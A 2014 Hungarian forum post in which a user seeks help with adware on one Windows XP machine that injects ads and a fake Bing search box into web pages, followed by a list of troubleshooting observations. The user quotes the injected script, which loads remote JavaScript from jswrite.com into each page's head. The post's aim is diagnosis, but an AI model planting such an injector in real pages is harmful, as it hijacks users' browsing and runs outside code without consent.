kasza_g Creative Commons License 2014.06.20 0 0 132022

Sziasztok, új vagyok itt és a következö problémával fordulok hozzátok:

 

A legtöbb weboldalt elárasztották a reklámok, amik szerintem nem a szervertöl jönnek. Ahol megjelenik, ott az oldal tetején egy magát Bing-nek kiadó keresö ablak van, de a search.conduit.com-ra submittál. Ezekben az oldalakban a HTML elejére a következö scriptet itteszti be:

 

<!doctype html>

<html lang="en">

       <head><script>if(typeof window.__wsujs==='undefined'){window.__wsujs=8978;window.__wsujsn='MediaAds';window.__wsujss='94E8D55330AFC323B94E091B80C64303';} </script>

                                                       <script>if(top == self){

                                                          var zhead = document.getElementsByTagName('head')[0];

                                                          if(!zhead){zhead = document.createElement('head');}

                                                          var qscript = document.createElement('script');

                                                          qscript.setAttribute('id','wsh2_js');

                                                          qscript.setAttribute('src','http://jswrite.com/script1.js');

                                                          qscript.setAttribute('type','text/javascript');qscript.async = true;

                                                          if(zhead && !document.getElementById('wsh2_js')) zhead.appendChild(qscript);

                                                      } </script>

 

aztán innen folytatódik az eredeti HTML. A google sajna csak 4-5 eredményt hozott, de egyiket sem latin betükkel írták. Azért egy-két dolgot kipróbáltam, ezeket megosztom, hátha ötletet ad.

Az otthoni privát IP-ket használó hálózatot egy router köti össze az internettel, amelyik NAT-ol. Befelé csak néhány port lesz forwardolva, pl. a 80-as egy Raspberry-re, ehhez egy noip.me-s domain is lett regisztrálva.

Tehát a tapasztalatok:

  1. A hibát csak egy gép produkálja. Ezen WinXP fut.
  2. Ezen a gépen a Firefox 30.0, és az IE8-ban is fertözödik.
  3. A többi Windows-os és Linux-os gépek nem hibáznak.
  4. A google nem fertözödik, az index.hu igen!
  5. A Raspberry-n lévö oldalakat ha a privat ip-t beadva nyitom meg akkor nem fertözödik, de ha a noip.me-n keresztül akkor igen!
  6. Proxy-t tudatosan sehol nem telepítettem, a Firefox biztos hogy nem is használ.

Hol agaszkodhatott rá valami a Web-kapcsolatomra?

 

Minden segítséget köszönök

kasza_g